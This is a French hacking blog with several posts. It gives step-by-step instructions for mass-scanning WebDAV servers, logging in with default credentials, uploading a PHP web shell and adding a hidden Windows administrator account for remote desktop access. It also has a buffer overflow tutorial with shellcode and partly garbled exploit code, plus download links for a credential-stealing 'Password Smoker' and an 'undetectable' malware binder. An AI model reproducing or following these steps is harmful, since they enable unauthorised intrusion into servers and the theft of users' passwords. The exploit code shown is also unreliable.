Pentest de serveur dédier

octobre 31, 2010 3 commentaires

Bonjour dans se tutoriel je vais vous montrer comment pentest un serveur dédier simplement  !

 

Tout d’abord télécharger cela :

http://www.multiupload.com/SMW7LFOCGS

 

1.) Exécuter WebDavLinkCrawler et laissez-le scan!
2.) Quand vous pensez que vous avez assez d’ip , appuyez sur ‘Stop‘,
puis sur «to remove Double IPs »  qui permet de supprimer la double IPs.
3.) Un clic droit  et vous cliquer sur  ‘Alle IPs kopieren’
Ensuite, ouvrez le bloc-notes et collez les adresses IP ! (fait un fichier ip.txt)
4.) Ouvrez IP Scanner, charger le fichier IPs TXT, et appuyez sur ‘Scan’
5.) Maintenant, la première colonne sont les adresses IP chargé, le second la Exploitables,
et la troisième son les IPs scanner.

Ip scanner
6.) Maintenant, après un temps il y aura de plus en plus d’ IPs dans la colonne centrale.
Copier / Coller ceux du Bloc-notes. Disons premier est 111.222.333.444, allez à votre navigateur.
Firefox , et collez l’adresse IP, avec / webdav « après. Sa fait est donc 111.222.333.444/webdav.
Si elle dit «PageTest WebDAV, il est vulnérable. Installez BitKinex, ouvrez-le. Appuyez sur CTRL 2
Tape rien comme nom, une fenêtre apparaîtra. Comme adresse de serveur mets l’adresse IP du
Serveur vulnérable. Comme utilisateur met « wampp » et comme mot de passe met « xampp ».
Ensuite, allez sur « Data Source » sur la gauche de la fenêtre, et de mettre « / webdav » comme répertoire par défaut.

pente
Appuyez sur OK, puis à droite cliquez sur votre serveur , sur le serveur HTTP / WebDAV onglet, puis cliquez sur Parcourir.

SAS
Il se connecte à elle, alors vous pouvez télécharger vos Shell.php.

Après son envoi, aller à la page
http://IPHERE/webdav nouveau, seulement mis SHELL-NOM-après HERE.php / WebDAV. Il est donc
111.222.333.444/webdav/shell.php ou quelque chose comme ça. Ensuite, exécutez les commandes suivantes:

net user Username /add

net user Username Password

net localgroup « Administrators » « Username » /add

Au lieu du nom d’utilisateur, mettez le nom d’utilisateur souhaité, je recommande quelque chose comme « SQLOperator ».

7.) Ça y est. Maintenant, il vous suffit d’ouvrir Connexion Bureau à distance ou de quelque chose de semblable, et communiquer !

Exemple D’attacks Buffer Overflow

Bon dans se tutoriel je vai vous montrer un exemple d’attaque (buffer overflow)

Un dépassement de mémoire tampon est une faille par laquelle un programme réagit anormalement lorsque la mémoire tampon sont surchargés, d’où l’écriture sur la mémoire adjacente. Il peut être déclenché à l’aide d’entrées qui peuvent modifier la façon dont fonctionne un programme, par exemple <inputting une très grande valeur dans le programme alternatif qui ne addition> nombre entier d’après. Un débordement de tampon peut conduire à des crash du programme, erreur d’accès mémoire, les sorties des ordures et pire, d’une violation de la sécurité du système. Probablement, vous pourriez avoir vu les exploits de dépassement de tampon de premier plan fondée et attaques dans Metaspl0it ou tout autre cadre spl0it autres. Pourquoi j’ai écrit cela? Tout simplement parce que beaucoup d’entre vous pense se type d’attaks est « difficile » =).
lire et apprendre ..

nb: Les balise du code HTML son utiliser pour mieux différencier les syntaxe.

Notre programme de vuln:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
char str[10];
strcpy(str, argv[1]);
printf("Done");

return 0;
}

Comme vous le voyez, argv [1] est copié dans str (str peut contenir 10 caractères)
Essayez de penser – Qu’est-ce qui arrive quand on charge plus de 10 octets sur str? Vous verrez.

Essayons de compiler le programme et la charge de 12 octets:

niv@niv-desktop:~/Desktop$ gcc-3.3 bof.c -o bof
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x12'`
Doneniv@niv-desktop:~/Desktop$


Le programme a été compilé avec succès, même si nous avons chargé 12 octets, ce qui signifie que 12 octets ne sont pas assez pour déborder le programme.

Essayons de débordement du programme avec 14 octets:

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x14'`
Doneniv@niv-desktop:~/Desktop$

Échec. Encore une fois.

Maintenant esseyons 32 octets :

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x32'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$[

Dans le cas où il est dit: / *** stack smashing detected *** / ou quelque chose qui semble être comme cette erreur, allez simplement sur le terminal, tapez: sudo apt-get install gcc-3.3 et lors de la compilation le taper gcc-3.3 Par exemple example.c-o au lieu d’exemple example.c-o gcc.

Nous l’avons fait, nous avons débordé du programme.

Maintenant, nous allons vérifier exactement ce qui se passe pour:

niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright © 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x32'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip 0x41414141 0x41414141

Nous écrasé l’EIP avec A (A = 41 en hexadécimal) – L’EIP est le pointeur de l’instructeur, il pointe à la prochaine instruction.

Maintenant, nous pouvons commencer à écrire notre exploit.
Notre exploitation va contenir les
NOPSLED + + Shellcode l’adresse du shellcode (RET).

Le NOPSLED est une chaîne de 0x90 (NOPSLED = pas d’opération) de sorte que le NOPSLED sera placé devant notre shellcode.
Le NOPSLED nous aide si nous n’avons pas de sauter exactement à l’endroit de la mémoire où commence notre shellcode.

---------- exploit.c --------------
#include <stdio.h>
#include <string.h>

char exploit[2048];

int main(void)
{
int i;
/*
* (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
* - izik <izik@tty64.org>
*/
char shellcode[] =
"\x6a\x05" // push $0x5
"\x58" // pop %eax
"\x31\xc9" // xor %ecx,%ecx
"\x51" // push %ecx
"\xb5\x08" // mov $0x8,%ch
"\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
"\x68\x65\x76\x2f\x63" // push $0x632f7665
"\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
"\x89\xe3" // mov %esp,%ebx
"\xcd\x80" // int $0x80
"\x89\xc3" // mov %eax,%ebx
"\xb0\x36" // mov $0x36,%al
"\x66\xb9\x09\x53" // mov $0x5309,%cx
"\xcd\x80" // int $0x80
"\x40" // inc %eax
"\xcd\x80"; // int $0x80

for(i = 0; i < 512; i++)
strcat(exploit, "0x90");

strcat(exploit, shellcode);

printf("Loaded.\n");

return 0;
}
---------- exploit.c --------------

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.


Exécuter notre programme vuln afin que nous puissions trouver la RET, l’adresse de notre shellcode.
Après l’avoir exécuté, nous allons comparer les ESP – les points ESP sur le dernier élément utilisé sur la pile.

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x60'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright © 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x60'`

Programme a reçu signal SIGSEGV, Segmentation fault.

0x41414141 en? ()
(Gdb) x / s $ esp

On vas avoir ces choses:

0xbf949694: "`???}_???o??02"
(gdb)
0xbf9496a2: ""

ect…

Continuez à chercher jusqu’à ce que vous verrez quelque chose comme cette chose:

0xbf9496e0:"7?\224?J?\224?U?\224?i?\224?y?\224??\224?02?\224?24?\224?*?\224?3?\224???\22​4??\224?\v?\224?30?\224?N?\224?Y?\224?q?\224???\224??\224???\224???\224?25?\​224?&?\224?;?\224?D?\224?W?\224?n?\224?v?\224?\205?\224???\224???\224?24?\224?P​?\224?p?\224?}?\224?\212?\224???\224??\224?"


0xbf9496e0 est l’adresse de notre shellcode (Le RET)

Pour faire fonctionner correctement notre exploit, nous avons besoin pour remplacer le PPC avec notre shellcode.prendrez notre ancienne adresse (0xbf9496e0) et faire cette chose:

Participez à notre adresse et lui donner l’air de cette façon: bf 94 96 e0
Obtiens les derniers octets (e0) et procédez comme suit:
nous allons bloquer les caractères entre l ‘(slash), ajouter dans chaque bloc x -> \ xE0 \
vous faire la même chose à chaque 2 caractères et puis les mettre dans l’ordre que les derniers octets de l’adresse de nos sera le premier dans notre nouvelle adresse:

0xbf9496e0 -> \xe0\x96\x94\xbf

Maintenant, nous alons atteindre notre shellcode cette façon:
Depuis que nous avons débordé le programme avec 32 octets (32 de A),
et la longueur de notre RET est de 4 octets nous va soustraire la longueur de l’adresse de notre shellcode (RET) de la A,
et nous sommes va imprimer 28 A (32 A – 4 octets (longueur RET) = 28) et le RET afin que nous puissions atteindre le shellcode succès.

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x28'``printf
"\xbf\x94\x96\xe0"`

Je suppose que vous avez déjà compris ce qui allait se produire si vous avez lu l’exploit

Passwords Smoker’s (outil de récupération de mot de passe)

septembre 24, 2010 2 commentaires

Salut, je me suis documenté sur le Delphi, et je me suis fait aidé par Jason pour faire un Password Smoker en Delphi  (type console) .

Paswords Smokers donne le moyen le plus rapide pour vérifier un système de mots de passe possibles, et vous montrer les mots de passe immédiatement.
Lorsque le système Windows en cours d’exécution, de nombreuses données importantes sont stockées dans la zone du système, silencieux et comprend votre, privés et soi-disant des informations personnelles confidentielles. Password Smoker lit ces données dans le système actuel, et des extraits du nom d’utilisateur / mot de passe d’infos pour vous.
Les mots de passe comprennent le mot de passe MSN Messenger, Windows Messenger Live mot de passe, mot de passe Hotmail, Yahoo mot de passe, mot de passe Outlook, mots de passe saisie semi-automatique, les ouvertures de session du site Web, dial-up mot de passe etc Password Smoker  trouverez également quelques «noms d’utilisateurs possible / mots de passe ».

Fichier : 392 KB (401 408 bytes)

Bin : http://www.multiupload.com/GDL11WHQNB

Alien Binder fully indetectable

septembre 23, 2010 1 commentaire

Aller pour commencer , un bon petit Binder , codé en C#  =D, le binder se sert de ixpresse de windows , il reste fully indétectable =D

Le binder est très (trop) simple à utiliser, vous n’aurez qu’a choisir les fichier, je vous déconseille de crypter le serveur pour éviter de prendre le risque qu’il ne marche plus.
Binder:123  Ko (123 241 octets)

Bin : http://www.multiupload.com/XU80FLQKA6

Rappel : ‘Les binders (ou joiners ou colleurs ou …) servent à ‘coller’ deux fichiers entre eux. C’est-à-dire qu’il va assembler les deux fichiers en un seul et dès que l’on ouvrira l’éxecutable obtenu, les fichiers s’éxcuteront ensemble.’